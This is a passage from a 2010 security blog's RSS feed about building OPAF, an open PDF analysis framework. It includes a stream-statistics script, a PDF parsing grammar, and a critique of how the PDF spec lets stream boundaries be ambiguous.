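for ident, type_name in (("1", "ObjStm"), ("2", "XObject")):
    stream = ET.SubElement(root, "indirect_object_stream", id=ident)
    add_entry(ET.SubElement(stream, "dictionary"), "Type", type_name)


def object_streams(tree_root):
    """Streams whose dictionary has a 'Type' key followed by an 'ObjStm' value."""
    hits = []
    for stream in tree_root.iter("indirect_object_stream"):
        for entry in stream.findall("dictionary/dictionary_entry"):
            children = list(entry)
            for index, child in enumerate(children):
                is_type_key = child.tag == "name" and child.get("payload") == "Type"
                # Equivalent of following-sibling::*[@payload="ObjStm"]
                followed = any(s.get("payload") == "ObjStm" for s in children[index + 1:])
                if is_type_key and followed:
                    hits.append(stream)
                    break
            if hits and hits[-1] is stream:
                break  # already selected; same effect as the /../../.. backtrack
    return hits


print([s.get("id") for s in object_streams(root)])
```

<p>Returning the stream element itself plays the role of the final /../../.. step: the match happens deep inside the dictionary, but what we keep is the enclosing stream.</p>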
<p>Now it counts any filtered stream. Looking for every pdf stream that has a /Filter key&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>for xml_fi in xml_pdf.xpath('//indirect_object_stream/dictionary/'+
                           'dictionary_entry/name[@payload=enc("Filter")]/'+
                           '../*[position()=2]'):
    if xml_fi.tag == 'array':
        fis = [payload(x) for x in xml_fi]
    elif xml_fi.tag == 'name':
        fis = [payload(xml_fi)]
    else:
        fis = []
    for fi in fis:
        filters[fi] = filters.get(fi,0)+1</pre>
</div>
<p>Count every different object type in the file, that is, every object that has a &#8216;Type&#8217; key in its dictionary&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>for xml_ty in xml_pdf.xpath('//dictionary/dictionary_entry'+
                             '/name[@payload=enc("Type")]'+
                             '/following-sibling::*[1]'):
    ty = payload(xml_ty)
    types[ty] = types.get(ty,0)+1</pre>
</div>
<p>Count all indirect objects&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>iobjects = xml_pdf.xpath('//indirect_object')</pre>
</div>
<p>All streams on the file&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>streams = xml_pdf.xpath('//indirect_object_stream')</pre>
</div>
<p>All filtered streams&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>fstreams = xml_pdf.xpath('//indirect_object_stream'+
                                '/dictionary/dictionary_entry'+
                                '/name[@payload=enc("Filter")]'+
                                '/../../..')</pre>
</div>
<p>And all objects which were previously compressed and are now children of a root-level stream.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>cobjects.append(len(xml_pdf.xpath('//indirect_object_stream//indirect_object')))</pre>
</div>
<p>And finally print statistics to stdout.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>print "Total number of parsed bytes: %s"%len(pdf)
print "Total number of indirect objects: %s"%len(iobjects)
print "Total number of streams: %s"%len(streams)
print "Total number of filtered streams: %s"%len(fstreams)
print "Total number of compressed objects: %s"%sum(cobjects)
print "Object Filter frequencies: %s"%repr(filters)
print "Object Type frequencies: %s"%repr(types)</pre>
</div>
<p>A version of this script is <a href="http://pastebin.com/JwXuwgac">here</a> (you need opaf). You run it like this&#8230;</p>
<blockquote><p>python stats.py file1.pdf</p></blockquote>
<p>&#8230; and it should give you something like the following if parsing was ok and all the other beta stuff went ok too.</p>
<pre>Total number of parsed files: 82
Total number of parsed bytes: 100452601 [avg:1225031.71951]
Total number of indirect objects: 55928 [avg:682.048780488]
Total number of streams: 11726 [avg:143.0]
Total number of filtered streams: 10382 [avg:126.609756098]
Total number of compressed objects: 9093 [avg:110.890243902]
Object Filter frequencies:
{'A85': 1,
  'ASCII85Decode': 163,
  'CCITTFaxDecode': 128,
  'JBIG2Decode': 2,
  'LZWDecode': 559,
  'FlateDecode': 9075,
  'DCTDecode': 608,
  'JPXDecode': 3}

Object Type frequencies:
{'XObject': 2699,
  'Group': 45,
  'Pattern': 3,
  'PropertyList': 1,
  'OCG': 12,
  'OBJR': 3,
  'OCMD': 7,
  'ObjStm': 204,
  'Metadata': 161,
  'FileSpec': 159,
  'ExtGState': 598,
  'Halftone': 12,
  'Catalog': 95,
  'ViewerPreferences': 1,
  'Outlines': 18,
  'Filespec': 10,
  'Mask': 8,
  'Annot': 5300,
  'StructTreeRoot': 13,
  'FontDescriptor': 955,
  'Action': 32,
  'Page': 2962,
  'XRef': 24,
  'Encoding': 219,
  'EmbeddedFile': 4,
  'Pages': 427,
  'Font': 1473,
  'JobTicketContents': 1}</pre>
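<p>The <strong>[avg:...]</strong> figures in that listing are consistent with each total divided by the number of parsed files (11726 streams over 82 files gives 143.0). A rough sketch of that aggregation, with made-up per-file numbers and a hypothetical <strong>aggregate</strong> helper that is not taken from the pastebin script:</p>

```python
from collections import Counter

def aggregate(per_file):
    """Sum per-file counters and compute the per-file average of each total."""
    totals = Counter()
    for stats in per_file:
        totals.update(stats)
    n = len(per_file)
    averages = {key: totals[key] / n for key in totals} if n else {}
    return totals, averages

# Two made-up files, only here to exercise the function.
per_file = [
    {"bytes": 1000, "indirect objects": 10, "streams": 4},
    {"bytes": 3000, "indirect objects": 20, "streams": 2},
]
totals, averages = aggregate(per_file)
for key in totals:
    print("Total number of %s: %d [avg:%s]" % (key, totals[key], averages[key]))
```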
]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/08/26/pdf-stats/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/09/t_small-b.png" medium="image">
			<media:title type="html">Follow feliam on Twitter</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/filtersfrq.png?w=300" medium="image">
			<media:title type="html">filtersfrq</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/frequencies.png?w=300" medium="image">
			<media:title type="html">frequencies</media:title>
		</media:content>
	</item>
		<item>
		<title>Opaf!</title>
		<link>http://feliam.wordpress.com/2010/08/23/opaf/</link>
		<comments>http://feliam.wordpress.com/2010/08/23/opaf/#comments</comments>
		<pubDate>Mon, 23 Aug 2010 05:11:16 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[malware analisys]]></category>
		<category><![CDATA[parser]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=451</guid>
		<description><![CDATA[It&#8217;s an Open PDF Analysis Framework! A PDF file relies on a complex file structure built from a set of tokens and grammar rules, and each token may be compressed, encrypted or even obfuscated. Open PDF Analysis Framework will understand, decompress and de-obfuscate these basic PDF elements and present the resulting soup as a clean XML tree (done!). [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=451&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<h1>It&#8217;s an Open PDF Analysis Framework!</h1>
<table>
<tbody>
<tr>
<td>A PDF file relies on a complex file structure built from a set of tokens and grammar rules, and each token may be compressed, encrypted or even obfuscated. <strong>Open PDF Analysis Framework</strong> will understand, decompress and de-obfuscate these basic PDF elements and present the resulting soup as a clean XML tree (done!). From there the idea is to compile a set of rules that can be used to decide what to keep, what to cut out and ultimately whether it is safe to open the resulting PDF projection (todo!).</td>
<td><a href="http://feliam.files.wordpress.com/2010/08/expansion-2.png"><img class="alignright size-medium wp-image-459" title="expansion-2" src="http://feliam.files.wordpress.com/2010/08/expansion-2.png?w=240&#038;h=240" alt="" width="240" height="240" /></a></td>
</tr>
</tbody>
</table>
<p>It&#8217;s written in Python using the <a href="http://www.dabeaz.com/ply/">PLY</a> parser generator. The project page is <a href="http://code.google.com/p/opaf/source/checkout">here</a> and you can get the code from here:</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">svn checkout <a href="http://opaf.googlecode.com/svn/trunk/" rel="nofollow">http://opaf.googlecode.com/svn/trunk/</a> opaf-read-only</div>
<p style="text-align:left;">Keep reading for a test run&#8230;<br />
<span id="more-451"></span><br />
Most of the work OPAF! will hide from you is outlined in our earlier posts about <a href="http://feliam.wordpress.com/2010/08/06/lexing-pdf-just-for-the-un-fun-of-it/">scanning a pdf</a>, <a href="http://feliam.wordpress.com/2010/08/22/pdf-sequential-parsing/">parsing a pdf</a> and also the one discussing the caveats in the actual PDF ISO standard <a href="http://feliam.wordpress.com/2010/08/14/pdf-a-broken-spec/">here</a>. Besides the straightforward natural parsing algorithm, the lib also tries a brute-force algorithm based on just a few tokens. Let&#8217;s take a look at what it can already do&#8230;</p>
<p>Well, you first need a shady pdf like this <a href="http://feliam.files.wordpress.com/2010/08/textg.pdf">one</a>. This is not an alien PDF and there&#8217;s nothing really malicious about it. It even looks plain&#8230;<br />
<a href="http://feliam.files.wordpress.com/2010/08/pdf.png"><img class="size-medium wp-image-452 aligncenter" title="pdf" src="http://feliam.files.wordpress.com/2010/08/pdf.png?w=222&#038;h=300" alt="" width="222" height="300" /></a></p>
<p>&#8230; but if you try to open it with a text/hex editor it stops being so friendly&#8230;</p>
<p style="text-align:center;"><a href="http://feliam.files.wordpress.com/2010/08/pdfhex.png"><img class="size-medium wp-image-453 aligncenter" title="pdfhex" src="http://feliam.files.wordpress.com/2010/08/pdfhex.png?w=300&#038;h=215" alt="" width="300" height="215" /></a></p>
<p>Here is where you get to try the OPAF! thing. Get the code and the pdf, resolve the dependencies and run it like this&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">python opaf.py textg.pdf</div>
<p style="text-align:center;">It will generate a graph like the following for your amusement&#8230;<br />
<a href="http://feliam.files.wordpress.com/2010/08/graphpdf.png"><img class="size-medium wp-image-454 aligncenter" title="graphpdf" src="http://feliam.files.wordpress.com/2010/08/graphpdf.png?w=300&#038;h=300" alt="" width="300" height="300" /></a></p>
<p style="text-align:left;">That shows the minimalistic logical structure of this PDF. Note that you may get really big graphs here with other pdf samples. I have tried up to 3k nodes. That&#8217;s fun, but sadly not very useful. But that&#8217;s not all! It also gets you an XML representation of the pdf. This XML will look like this&#8230;<br />
<a href="http://feliam.files.wordpress.com/2010/08/pdfxml.png"><img class="size-medium wp-image-455 aligncenter" title="pdfxml" src="http://feliam.files.wordpress.com/2010/08/pdfxml.png?w=300&#038;h=205" alt="" width="300" height="205" /></a></p>
<p style="text-align:left;">After this step you can pretty much bring every known XML technology into the game, XPath being the most notable one when searching for specific things. The project (small, young, unfinished, flagged work-in-progress and not really well coded) includes some examples of what you can do once you have the PDF in its XML form. Use it, ignore it, patch it (lots of basic things are yet to be done). It&#8217;s open source!!! f/</p>
<p><span style="color:#ff0000;">&#8211;update&#8211;</span><br />
Made a snapshot for you, download it <a href="http://sites.google.com/site/felipeandresmanzano/opaf-read-only.tar.bz2">here</a>. Also in the news, the main tool now accepts some basic arguments&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>/opaf $ python opaf.py  --help
Usage: opaf.py [options]

Options:
  -h, --help            show this help message and exit
  -x XML, --xmlfile=XML
                        Generate an xml file.
  -l LOG, --logfile=LOG
                        Dump log messages to LOG file.
  -i, --interactive     Throw interactive python shell
  -g GRAPH, --graph=GRAPH
                        Generate and dump graph to GRAPH.
  -d, --decompress      Apply a filter pack to decompress and parse objec
                        streams.</pre>
</div>
<p>Also check out the next post for an example of use: taking statistics on pdf fuzzing databases with OPAF! <a href="http://wp.me/pLJYx-7Q">http://wp.me/pLJYx-7Q</a></p>
]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/08/23/opaf/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/expansion-2.png?w=300" medium="image">
			<media:title type="html">expansion-2</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/pdf.png?w=222" medium="image">
			<media:title type="html">pdf</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/pdfhex.png?w=300" medium="image">
			<media:title type="html">pdfhex</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/graphpdf.png?w=300" medium="image">
			<media:title type="html">graphpdf</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/pdfxml.png?w=300" medium="image">
			<media:title type="html">pdfxml</media:title>
		</media:content>
	</item>
		<item>
		<title>PDF sequential parsing</title>
		<link>http://feliam.wordpress.com/2010/08/22/pdf-sequential-parsing/</link>
		<comments>http://feliam.wordpress.com/2010/08/22/pdf-sequential-parsing/#comments</comments>
		<pubDate>Sun, 22 Aug 2010 01:52:32 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[parser]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=441</guid>
		<description><![CDATA[As discussed in earlier posts, the problem with PDF is that we cannot apply an out-of-the-box scanner/parser design pattern: it won&#8217;t let you scan it properly. The size of a PDF stream is hard to determine at scanner/lexer time. I&#8217;ve suggested the solution of escaping the &#8220;endstream&#8221; keyword. Other patches have also emerged, like [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=441&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p><a href="http://feliam.files.wordpress.com/2010/08/opaf-e1282442420334.png"><img src="http://feliam.files.wordpress.com/2010/08/opaf-e1282442420334.png?w=300&#038;h=187" alt="" title="opaf" width="300" height="187" class="alignright size-medium wp-image-440" /></a>As discussed in earlier posts, the problem with PDF is that we cannot apply an out-of-the-box scanner/parser design pattern: it won&#8217;t let you scan it properly. The size of a PDF stream is hard to determine at scanner/lexer time. I&#8217;ve suggested the solution of escaping the &#8220;endstream&#8221; keyword. Other patches have also emerged, like forcing the /Length entry to be direct, or calculating every object size using the XREF pointers (assuming there is no garbage between the objects, which is in fact what the spec says).</p>
<p>Well, in any case, if you manage to run a lexer and tokenize it, here you have the parsing grammar &#8230; weeee!!</p>
<pre>
object : NAME | STRING | HEXSTRING | NUMBER | TRUE | FALSE | NULL | R | dictionary | array 

dictionary : DOUBLE_LESS_THAN_SIGN dictionary_entry_list DOUBLE_GREATER_THAN_SIGN 

dictionary_entry_list : NAME object dictionary_entry_list
                      | empty  

array : LEFT_SQUARE_BRACKET object_list RIGHT_SQUARE_BRACKET 

object_list : object object_list 
            | empty

indirect : indirect_object_stream
         | indirect_object 

indirect_object : OBJ object ENDOBJ 
indirect_object_stream : OBJ dictionary STREAM_DATA ENDOBJ 

xref : indirect_object_stream 
     | XREF TRAILER dictionary 

pdf : HEADER pdf_update_list
pdf_update_list : pdf_update_list body xref pdf_end
                | body xref pdf_end

body : body indirect_object 
     | body indirect_object_stream 
     | empty

pdf_end : STARTXREF EOF
</pre>
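<p>To get a feel for the object part of that grammar, here is a small hand-written recursive-descent sketch. It is not the PLY parser from the project, just an illustration: the token names are the ones used in the grammar, while the <strong>(type, value)</strong> tuple layout and the function names are assumptions made up for the example.</p>

```python
# Token types that are objects on their own (first line of the grammar).
SIMPLE = {"NAME", "STRING", "HEXSTRING", "NUMBER", "TRUE", "FALSE", "NULL", "R"}

def parse_object(tokens, pos):
    """object : NAME | STRING | ... | R | dictionary | array"""
    kind, value = tokens[pos]
    if kind == "DOUBLE_LESS_THAN_SIGN":
        return parse_dictionary(tokens, pos)
    if kind == "LEFT_SQUARE_BRACKET":
        return parse_array(tokens, pos)
    if kind in SIMPLE:
        return (kind, value), pos + 1
    raise SyntaxError("unexpected token %s at %d" % (kind, pos))

def parse_dictionary(tokens, pos):
    """dictionary : '<<' (NAME object)* '>>'"""
    pos += 1  # skip the opening '<<'
    result = {}
    while tokens[pos][0] != "DOUBLE_GREATER_THAN_SIGN":
        kind, key = tokens[pos]
        if kind != "NAME":
            raise SyntaxError("dictionary key must be a NAME at %d" % pos)
        value, pos = parse_object(tokens, pos + 1)
        result[key] = value
    return ("dictionary", result), pos + 1

def parse_array(tokens, pos):
    """array : '[' object* ']'"""
    pos += 1  # skip the opening '['
    items = []
    while tokens[pos][0] != "RIGHT_SQUARE_BRACKET":
        item, pos = parse_object(tokens, pos)
        items.append(item)
    return ("array", items), pos + 1

def parse_indirect(tokens, pos):
    """indirect : OBJ object ENDOBJ | OBJ dictionary STREAM_DATA ENDOBJ"""
    kind, ident = tokens[pos]
    if kind != "OBJ":
        raise SyntaxError("expected OBJ at %d" % pos)
    body, pos = parse_object(tokens, pos + 1)
    stream = None
    if tokens[pos][0] == "STREAM_DATA":
        if body[0] != "dictionary":
            raise SyntaxError("a stream must follow a dictionary")
        stream = tokens[pos][1]
        pos += 1
    if tokens[pos][0] != "ENDOBJ":
        raise SyntaxError("expected ENDOBJ at %d" % pos)
    return {"id": ident, "object": body, "stream": stream}, pos + 1

# A tiny token list in the assumed (type, value) layout.
tokens = [
    ("OBJ", ("6", "0")),
    ("DOUBLE_LESS_THAN_SIGN", "<<"),
    ("NAME", "ProcSet"),
    ("LEFT_SQUARE_BRACKET", "["),
    ("NAME", "PDF"),
    ("NAME", "Text"),
    ("RIGHT_SQUARE_BRACKET", "]"),
    ("DOUBLE_GREATER_THAN_SIGN", ">>"),
    ("ENDOBJ", "endobj"),
]
parsed, next_pos = parse_indirect(tokens, 0)
```

<p>The loops replace the right-recursive list rules of the grammar; a truncated token list simply ends in an IndexError here, which a real parser would want to report properly.</p>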
<p>f/</p>
]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/08/22/pdf-sequential-parsing/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/opaf-e1282442420334.png?w=300" medium="image">
			<media:title type="html">opaf</media:title>
		</media:content>
	</item>
		<item>
		<title>PDF, A broken Spec!</title>
		<link>http://feliam.wordpress.com/2010/08/14/pdf-a-broken-spec/</link>
		<comments>http://feliam.wordpress.com/2010/08/14/pdf-a-broken-spec/#comments</comments>
		<pubDate>Sat, 14 Aug 2010 22:26:30 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[ISO32000]]></category>
		<category><![CDATA[specificaion]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=395</guid>
		<description><![CDATA[(Or why I can&#8217;t parse a PDF) This post is about the difficulties I ran into when trying to write a PDF parser. It&#8217;s my opinion that PDF specification is broken because it permits the token &#8220;endstream&#8221; inside a stream! Summary: There are  4 ways of deciding the size of a PDF stream: [+] Scanning for [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=395&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<h1>(Or why I can&#8217;t parse a PDF)</h1>
<table>
<tbody>
<tr>
<td>This post is about the difficulties I ran into when trying to write a PDF parser. It&#8217;s my opinion that</p>
<div style="margin:15px;padding:15px;">
<h3>PDF specification is broken because it permits the token &#8220;endstream&#8221; inside a stream!</h3>
</div>
</td>
<td><a href="http://feliam.files.wordpress.com/2010/08/adobe_pdf_broken.jpg"><img class="alignleft size-medium wp-image-422" title="adobe_pdf_broken" src="http://feliam.files.wordpress.com/2010/08/adobe_pdf_broken.jpg?w=126&#038;h=126" alt="" width="126" height="126" /></a></td>
</tr>
</tbody>
</table>
<h2>Summary:</h2>
<p>There are  4 ways of deciding the size of a PDF stream:</p>
<p style="padding-left:30px;">[1] Scanning for the <strong>endstream</strong> token<br />
[2] Getting the size from the direct <strong>/Length</strong> entry<br />
[3] Getting the indirect <strong>/Length</strong> using the normal xref<br />
[4] Calculating the size from the object start offsets listed in the normal cross-reference</p>
<p>What happens in actual PDF implementations if:</p>
<p style="padding-left:30px;">[+] The cross-reference is broken?<br />
[+] The cross-reference points to overlapping objects?<br />
[+] A stream contains the <strong>endstream</strong> token?<br />
[+] A stream contains some evil <strong>endstream</strong>/<strong>endobj</strong> token combination?<br />
[+] All the 4 (or more) ways of sizing a PDF stream are present: should they all be consistent?</p>
<p>And finally, is this <a href="http://feliam.files.wordpress.com/2010/08/overlap.pdf">file</a> PDF compliant? I bet someone may construct an obfuscation method based on these &#8220;issues&#8221;.</p>
<p>If you still think this is worth reading, check out the following details and please comment if you find a bug or if you have a solution for the problems I state here.</p>
<p><span id="more-395"></span></p>
<h1>The problem&#8230;</h1>
<p>A PDF stream must be an indirect object. An indirect object is a PDF object enclosed between the keywords <strong>obj</strong> and <strong>endobj</strong>. If the following indirect object happens to be in your pdf:</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">100 0 obj
123456789
endobj</div>
</pre>
<p>then any reference of the form &#8220;<strong>100 0 R</strong>&#8221; appearing in the PDF will refer to the number <strong>123456789</strong>. Everything seems clean for indirect numbers and the other basic types like strings, arrays and even dictionaries. The problem arises with PDF streams:</p>
<blockquote><p>A stream object, like a string object, is a sequence of bytes. A stream shall consist of a dictionary followed by zero or more bytes bracketed between the keywords <strong>stream</strong>(followed by newline) and <strong>endstream</strong>.</p></blockquote>
<p>A stream will look like this&#8230;</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">&lt;&lt; \Length 100 &gt;&gt;
stream
AAAAAA ... AAAAAA
endstream</div>
</pre>
<h1>[1] Scan for the next <strong>endstream</strong></h1>
<pre>
<div style="border:2px solid gray;background:none repeat scroll 0 0 #989bb3;color:#0a8079;margin:20px;padding:20px;">First approach: GO UNTIL "endstream" KEYWORD
    pros: clean scan all the file then parse order.
    cons: slow and broken if endstream inside stream</div>
</pre>
<p>The first naive approach when parsing a PDF stream is to consume the dictionary &#8230;</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">&lt;&lt; \Length 100              &gt;&gt;  ----&gt;         { "Length": 100 }</div></pre>
<p>&#8230; then check if you have a <strong>stream</strong> keyword and scan until you get an <strong>endstream</strong></p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">stream
AAAAAA ... AAAAAA
endstream           ----&gt;         '''AAAAA ... AAAAA'''</div></pre>
<p>But what if, for some reason, you want to have the string &#8220;endstream&#8221; inside the PDF stream? Well, something will obviously go wrong. Just try to naive-parse the following stream (which contains the endstream string inside its payload):</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">&lt;&lt; \Length 100 &gt;&gt;
stream
AAAAAA ... AAAAendstream\nAAA ... AAAAAA
endstream</div></pre>
<p>You&#8217;ll get a stream shorter than it should be, followed by some binary garbage left outside the stream limits.</p>
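<p>The truncation is easy to reproduce. The following is a minimal sketch of the naive scan, not the code of any real reader; the <strong>naive_stream</strong> name and the toy payload are made up for the example.</p>

```python
def naive_stream(data, start=0):
    """Return the bytes between 'stream\\n' and the FIRST 'endstream' keyword."""
    begin = data.index(b"stream\n", start) + len(b"stream\n")
    end = data.index(b"endstream", begin)
    return data[begin:end]

# A payload that happens to contain the keyword (toy data).
payload = b"AAAA" + b"endstream\n" + b"BBBB"
obj = b"<< /Length %d >>\nstream\n" % len(payload) + payload + b"\nendstream"

found = naive_stream(obj)
print(len(payload), len(found))  # the scan stops at the embedded keyword
```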
<p>That&#8217;s <strong>wrong</strong> by specification. A PDF stream MUST be an indirect object, so it MUST also be enclosed between the <strong>N M obj</strong> and <strong>endobj</strong> tokens, like this:</p>
<pre><div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">100 0 obj
&lt;&lt; /Length 100 &gt;&gt;
stream
AAAAAA ... AAAAendstream\nAAA ... AAAAAA
endstream
endobj</div></pre>
<p>Interesting, but that&#8217;s not going to fix the problem, because we can also put the <strong>endobj</strong> keyword inside the binary stream. In fact we can simulate a complete trailing PDF structure inside the stream. Try to parse this by hand (ignore the <strong>/Length</strong> for now)&#8230;</p>
<pre> <div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">100 0 obj
&lt;&lt; /Length 100 &gt;&gt;
stream
AAAAAA ... AAAA
endstream
endobj
101 0 obj
(string)
endobj
AAA ... AAAAAA
endstream
endobj</div>

</pre>
<p>It should be interpreted as a stream containing this binary payload&#8230;</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">AAAAAA ... AAAA
endstream
endobj
101 0 obj
(string)
endobj
AAA ... AAAAAA
endstream</div>

</pre>
<p>NOTE: poppler, xpdf and Adobe parse it correctly despite the bugging &#8220;endstream&#8221;.</p>
<p>Yeah right. The only thing that becomes clear here is that we cannot rely &#8220;only&#8221; on the appearance of the <strong>stream</strong>, <strong>endstream</strong>, <strong>obj</strong> and <strong>endobj</strong> keywords. We need something else.</p>
<h1>[2] The mandatory /Length keyword.</h1>
<pre><div style="border:2px solid gray;background:none repeat scroll 0 0 #989bb3;color:#0a8079;margin:20px;padding:20px;">Second approach: GET THE /Length ENTRY
pros: fast and deterministic.
cons: Length could be an indirect object and depend on xref</div></pre>
<p>Each stream object MUST have a <strong>/Length</strong> entry in its dictionary to resolve the ambiguities and speed up the scanning process. The <strong>/Length</strong> value must be a number indicating the number of bytes in the stream. If we know the length we can &#8220;seek&#8221; to near the end of the stream payload and just check for the existence of the <strong>endstream</strong> keyword.</p>
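<p>A rough sketch of that seek-and-check, assuming the length is already known as a plain number; the <strong>stream_by_length</strong> helper is hypothetical and it simply tolerates any end-of-line bytes before the keyword.</p>

```python
def stream_by_length(data, begin, length):
    """Take `length` bytes starting at `begin`, then require 'endstream' after them."""
    payload = data[begin:begin + length]
    # Skip the end-of-line marker(s) sitting between the data and the keyword.
    rest = data[begin + length:].lstrip(b"\r\n")
    if len(payload) != length or not rest.startswith(b"endstream"):
        raise ValueError("no endstream keyword after %d bytes" % length)
    return payload

# Toy object whose payload contains the keyword itself.
payload = b"AAAA" + b"endstream\n" + b"BBBB"
obj = b"<< /Length %d >>\nstream\n" % len(payload) + payload + b"\nendstream"
begin = obj.index(b"stream\n") + len(b"stream\n")

recovered = stream_by_length(obj, begin, len(payload))
```

<p>With the right length the embedded keyword is harmless; with a wrong one the check fails, and then you have to decide what to do.</p>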
<p><strong>Caveat 1</strong>: What happens when there is no <strong>endstream</strong> keyword where there is supposed to be one?</p>
<p><strong>Caveat 2:</strong> To make PDF files easier to produce, the spec lets the Length value be an indirect reference to a number. That&#8217;s very useful when producing a PDF stream: you can postpone setting the length until you have already put the (potentially compressed) stream of bytes in place, and only then write out the size.</p>
<p style="padding-left:30px;">[+] Put a reference to a not yet defined length in the dictionary<br />
[+] Put the dictionary<br />
[+] Produce the stream<br />
[+] Set the length in the referenced indirect object</p>
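<p>Seen from the producer side, the four steps above could look roughly like this. It is only a sketch: the object numbers, the <strong>write_stream</strong> name and the use of zlib for the compression are assumptions for the example, and no cross-reference is written.</p>

```python
import zlib

def write_stream(out, num, length_num, raw):
    """Append stream object `num`; its /Length lives in object `length_num`."""
    # Steps 1 and 2: the dictionary only holds a reference to the length.
    out += b"%d 0 obj\n<< /Length %d 0 R /Filter /FlateDecode >>\nstream\n" % (num, length_num)
    # Step 3: produce the (compressed) stream bytes.
    data = zlib.compress(raw)
    out += data + b"\nendstream\nendobj\n"
    # Step 4: only now emit the indirect object holding the real length.
    out += b"%d 0 obj\n%d\nendobj\n" % (length_num, len(data))
    return len(data)

out = bytearray()
n = write_stream(out, 7, 8, b"A" * 1000)
```

<p>A reader going through this file front to back meets the stream before it meets object 8, which is exactly the problem discussed next.</p>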
<p>So, for parsing a stream object we need to get another indirect object. Indirect objects are defined with <strong>obj</strong> and <strong>endobj</strong> keywords. But <strong>obj</strong> and <strong>endobj</strong> could appear inside a stream too. Deadlock? Or there is another hidden card in the spec?..</p>
<h1>[3] The Normal Cross reference.</h1>
<div style="border:2px solid gray;background:none repeat scroll 0 0 #989bb3;color:#0a8079;margin:20px;padding:20px;">Third approach: CALCULATE THE SIZES OF THE OBJECTS USING THE XREF<br />
pros: super fast.<br />
cons: overlapping objects</div>
<p>The PDF cross reference is the fastest way to know where a certain indirect PDF object starts! It comes in two flavours, the normal XREF and the stream XREF.</p>
